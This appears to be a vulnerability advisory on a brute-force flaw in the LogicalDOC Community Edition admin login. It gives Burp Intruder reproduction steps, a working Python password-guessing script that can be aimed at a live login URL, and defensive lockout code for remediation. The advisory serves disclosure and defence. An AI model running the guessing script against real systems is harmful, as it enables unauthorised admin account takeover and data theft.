LogicalDOC Community Edition Brute Force Vulnerability in Admin Login Page

Vulnerability

A vulnerability exists in LogicalDOC Community Edition versions through 9.2.1, specifically in the admin login page's authentication process. The issue allows for excessive authentication attempts to be made, as the application lacks proper safeguards such as account lockout, rate limiting, or CAPTCHA. This vulnerability can be exploited remotely, with public proof-of-concept available.

Impact

Exploitation of this vulnerability could lead to unauthorized administrative access, allowing an attacker to take over admin accounts, access sensitive documents, modify or delete data, create privileged accounts, and potentially maintain persistence after the initial compromise.

Reproduction

To reproduce this vulnerability, navigate to the login page and capture a login request using Burp Suite. Send the request to Burp Intruder, keep the username parameter fixed, and mark the password parameter as the payload position. Load a password list into Intruder and launch the attack. Because the application never refuses or delays a request, every guess is answered; a successful login is identified by a response whose status code or length differs from the failed-login baseline (compare against a couple of deliberately wrong guesses first, so that small length variations in the failure page are not mistaken for a hit). This allows fully automated password guessing and admin account takeover.
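The same workflow as a script, added here as an illustration and not taken from LogicalDOC or from the advisory: a transport sends one login per guess, a baseline is measured from two guesses that cannot be right, and every reply whose status or length deviates from that baseline is reported, which is what sorting Intruder's results by status and length does by hand. The form field names, the login URL, and the fake server used for the offline demo are assumptions.

```python
"""Password guessing against a login form, mirroring the Burp Intruder steps above.

Added example; not code from LogicalDOC or from the advisory author. The field
names, the login URL and the fake server for the offline demo are assumptions.
"""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple
import urllib.error
import urllib.parse
import urllib.request


@dataclass(frozen=True)
class Reply:
    """The two signals Intruder shows per request, plus any redirect target."""
    status: int
    length: int
    location: Optional[str] = None


# A transport maps (username, password) to the server's Reply.
Transport = Callable[[str, str], Reply]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep 3xx replies visible instead of following them: a redirect on
    success is usually the clearest login signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_transport(url: str, user_field: str = "username",
                   pass_field: str = "password") -> Transport:
    """Real transport: POST a form-encoded login to `url` (assumed field names)."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(username: str, password: str) -> Reply:
        body = urllib.parse.urlencode({user_field: username, pass_field: password}).encode()
        req = urllib.request.Request(url, data=body, method="POST")
        try:
            with opener.open(req, timeout=10) as resp:
                return Reply(resp.status, len(resp.read()), resp.headers.get("Location"))
        except urllib.error.HTTPError as err:  # 3xx (due to _NoRedirect) and 4xx/5xx
            return Reply(err.code, len(err.read()), err.headers.get("Location"))
    return send


def fake_transport(accounts: dict) -> Transport:
    """Constructed stand-in for a server with no lockout or rate limit: every
    guess is answered, failures render the login page, success redirects."""
    def send(username: str, password: str) -> Reply:
        if accounts.get(username) == password:
            return Reply(302, 0, "/home")  # constructed post-login redirect
        return Reply(200, 4210)            # constructed failure page length
    return send


def measure_baseline(send: Transport, username: str) -> Tuple[Reply, int]:
    """Send two guesses that cannot be right and learn what failure looks like.
    Returns (reference Reply, length tolerance). Differing status codes between
    the two probes mean the signal is too noisy to use as-is."""
    a = send(username, "not-the-password-1")
    b = send(username, "not-the-password-2")
    if a.status != b.status:
        raise RuntimeError("failure responses are inconsistent; pick another signal")
    return a, abs(a.length - b.length)


def find_candidates(send: Transport, username: str, wordlist: Iterable[str],
                    base: Reply, tolerance: int) -> List[Tuple[str, Reply]]:
    """Try each password and flag replies whose status or length deviates from
    the failure baseline by more than the measured tolerance."""
    hits = []
    for password in wordlist:
        reply = send(username, password)
        if reply.status != base.status or abs(reply.length - base.length) > tolerance:
            hits.append((password, reply))
    return hits


if __name__ == "__main__":
    # Offline demo against the constructed server; on an engagement swap in
    # http_transport("https://target/login") with the captured field names.
    send = fake_transport({"admin": "Welcome1"})
    base, tol = measure_baseline(send, "admin")
    wordlist = ["admin", "password", "Welcome1", "letmein"]
    for pw, r in find_candidates(send, "admin", wordlist, base, tol):
        print(f"candidate {pw!r}: status={r.status} length={r.length} location={r.location}")
```

The script reports candidates rather than declaring success, because a different status or length can also come from a CSRF failure or an error page; confirm a candidate by replaying it and checking for the session cookie or redirect the real login produces.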

Remediation

It is recommended to implement account lockout or progressive rate-limiting after failed authentication attempts, enforce multi-factor authentication for admin accounts, normalize authentication response times, introduce CAPTCHA after suspicious activity, and block or throttle IPs that exhibit automated attack patterns.
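One way to implement the first and last of those controls, added here as an example and not code from LogicalDOC: a guard that counts failures per account and per source IP, lets a few attempts through, then imposes an exponentially growing delay that the endpoint would surface as HTTP 429 with a Retry-After header. A growing delay rather than a permanent lock keeps an attacker from locking the real administrator out simply by failing on purpose. The thresholds, the PBKDF2 credential store, and the fake clock are assumptions chosen so the file runs stand-alone; response-time normalization is left to the caller.

```python
"""Progressive lockout for a login endpoint: an added example of the remediation
above, not LogicalDOC code. Thresholds, the credential store and the fake clock
are assumptions made so the file runs stand-alone."""
import hashlib
import hmac
import os
import time
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, Tuple

PBKDF2_ROUNDS = 50_000  # kept low for the demo; production uses a far higher cost


def register(users: Dict[str, Tuple[bytes, bytes]], username: str, password: str) -> None:
    """Store a salted PBKDF2 hash in the constructed in-memory user table."""
    salt = os.urandom(16)
    users[username] = (salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS))


def make_verifier(users: Dict[str, Tuple[bytes, bytes]]) -> Callable[[str, str], bool]:
    """Constant-time credential check that costs the same for unknown users,
    so response time does not reveal which account names exist."""
    dummy = (b"\0" * 16, b"\0" * 32)

    def verify(username: str, password: str) -> bool:
        record = users.get(username)
        salt, expected = record if record is not None else dummy
        got = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
        return hmac.compare_digest(got, expected) and record is not None
    return verify


@dataclass
class _Counter:
    failures: int = 0
    blocked_until: float = 0.0


class FakeClock:
    """Controllable clock for the demo (constructed helper)."""
    def __init__(self, start: float = 1000.0) -> None:
        self.t = start

    def now(self) -> float:
        return self.t


class LoginGuard:
    """Per-account and per-source-IP failure tracking. After `free_attempts`
    failures the delay starts at `base_delay` seconds and doubles on each
    further failure, capped at `max_delay`."""

    def __init__(self, verify: Callable[[str, str], bool], *, free_attempts: int = 5,
                 base_delay: float = 30.0, max_delay: float = 3600.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self._verify, self._free = verify, free_attempts
        self._base, self._max, self._clock = base_delay, max_delay, clock
        self._state: Dict[str, _Counter] = defaultdict(_Counter)

    def _delay_for(self, failures: int) -> float:
        over = failures - self._free
        return 0.0 if over <= 0 else min(self._base * 2 ** (over - 1), self._max)

    def attempt(self, username: str, password: str, ip: str) -> Tuple[bool, float]:
        """Returns (authenticated, retry_after_seconds). A non-zero retry_after is
        what the endpoint sends as HTTP 429 with a Retry-After header."""
        now = self._clock()
        user, src = self._state["u:" + username], self._state["ip:" + ip]
        wait = max(user.blocked_until, src.blocked_until) - now
        if wait > 0:
            return False, wait  # refused before the credential store is touched
        if self._verify(username, password):
            user.failures = 0   # a real login clears the account counter only;
            return True, 0.0    # the IP counter keeps counting sprayed guesses
        for counter in (user, src):
            counter.failures += 1
            delay = self._delay_for(counter.failures)
            if delay:
                counter.blocked_until = now + delay
        return False, max(user.blocked_until, src.blocked_until, now) - now


if __name__ == "__main__":
    users: Dict[str, Tuple[bytes, bytes]] = {}
    register(users, "admin", "correct horse battery staple")
    clock = FakeClock()
    guard = LoginGuard(make_verifier(users), free_attempts=3, base_delay=10.0, clock=clock.now)
    for pw in ["admin", "password", "123456", "letmein", "qwerty", "correct horse battery staple"]:
        ok, wait = guard.attempt("admin", pw, "203.0.113.7")
        print(f"{pw!r:32} ok={ok} retry_after={wait:.0f}s")
        clock.t += wait  # even an attacker that honours the delay is slowed down
```

The per-IP counter is what stops password spraying across many accounts, and the per-account counter is what stops a distributed attack on one admin account; each failure increments both, but only a genuine login resets the account counter. Because a blocked request is refused before the password is checked, blocked and unblocked failures take different amounts of time; that is acceptable here since the Retry-After value already tells the client it is blocked.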

Added: Oct 31, 2025, 7:26 PM
Updated: Oct 31, 2025, 7:26 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 5.0
exploitability: 8.0
remediation: 0.0
relevance: 0.8
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.